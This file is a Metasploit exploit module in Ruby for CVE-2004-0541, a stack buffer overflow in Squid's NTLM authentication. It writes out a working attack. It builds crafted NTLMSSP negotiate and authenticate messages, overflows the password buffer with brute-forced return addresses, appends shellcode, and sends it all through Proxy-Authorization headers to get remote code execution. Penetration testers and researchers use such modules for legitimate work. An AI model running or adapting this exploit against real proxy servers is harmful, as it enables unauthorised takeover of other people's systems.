##
# $Id: squid_ntlm_authenticate.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Brute
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Squid NTLM Authenticate Overflow',
'Description' => %q{
This is an exploit for Squid\'s NTLM authenticate overflow
(libntlmssp.c). Due to improper bounds checking in
ntlm_check_auth, it is possible to overflow the 'pass'
variable on the stack with user controlled data of a user
defined length. Props to iDEFENSE for the advisory.
},
'Author' => 'skape',
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-0541'],
[ 'OSVDB', '6791'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
[ 'BID', '10500'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 256,
'MinNops' => 16,
'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
'PrependEncoder' => "\x83\xec\x7f",
},
'Targets' =>
[
[ 'Linux Bruteforce',
{
'Platform' => 'linux',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
'Step' => 0
}
},
],
],
'DisclosureDate' => 'Jun 8 2004',
'DefaultTarget' => 0))
register_advanced_options(
[
# We must wait 15 seconds between each attempt so as to prevent
# squid from exiting completely after 5 crashes.
OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
], self.class)
end
def brute_exploit(addresses)
site = "http://" + rand_text_alpha(rand(128)) + ".com"
print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
connect
trasnmit_negotiate(site)
transmit_authenticate(site, addresses)
handler
disconnect
end
def trasnmit_negotiate(site)
negotiate =
"NTLMSSP\x00" + # NTLMSSP identifier
"\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE
"\x07\x00\xb2\x07" + # flags
"\x01\x00\x09\x00" + # workgroup len/max (1)
"\x01\x00\x00\x00" + # workgroup offset (1)
"\x01\x00\x03\x00" + # workstation len/max (1)
"\x01\x00\x00\x00" # workstation offset (1)
print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
req =
"GET #{site} HTTP/1.1\r\n" +
"Proxy-Connection: Keep-Alive\r\n" +
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
"\r\n"
sock.put(req)
end
def transmit_authenticate(site, addresses)
overflow =
rand_text_alphanumeric(0x20) +
[addresses['Ret']].pack('V') +
[addresses['Valid']].pack('V') +
"\xff\x00\x00\x00"
shellcode = payload.encoded
pass_len = [overflow.length + shellcode.length].pack('v')
authenticate =
"NTLMSSP\x00" + # NTLMSSP identifier
"\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE
pass_len + pass_len + # lanman response len/max
"\x38\x00\x00\x00" + # lanman response offset (56)
"\x01\x00\x01\x00" + # nt response len/max (1)
"\x01\x00\x00\x00" + # nt response offset (1)
"\x01\x00\x01\x00" + # domain name len/max (1)
"\x01\x00\x00\x00" + # domain name offset (1)
"\x01\x00\x01\x00" + # user name (1)
"\x01\x00\x00\x00" + # user name offset (1)
"\x00\x00\x00\x00" + # session key
"\x8b\x00\x00\x00" + # session key
"\x06\x82\x00\x02" + # flags
overflow + shellcode
print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
req =
"GET #{site} HTTP/1.1\r\n" +
"Proxy-Connection: Keep-Alive\r\n" +
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
"\r\n"
sock.put(req)
end
end
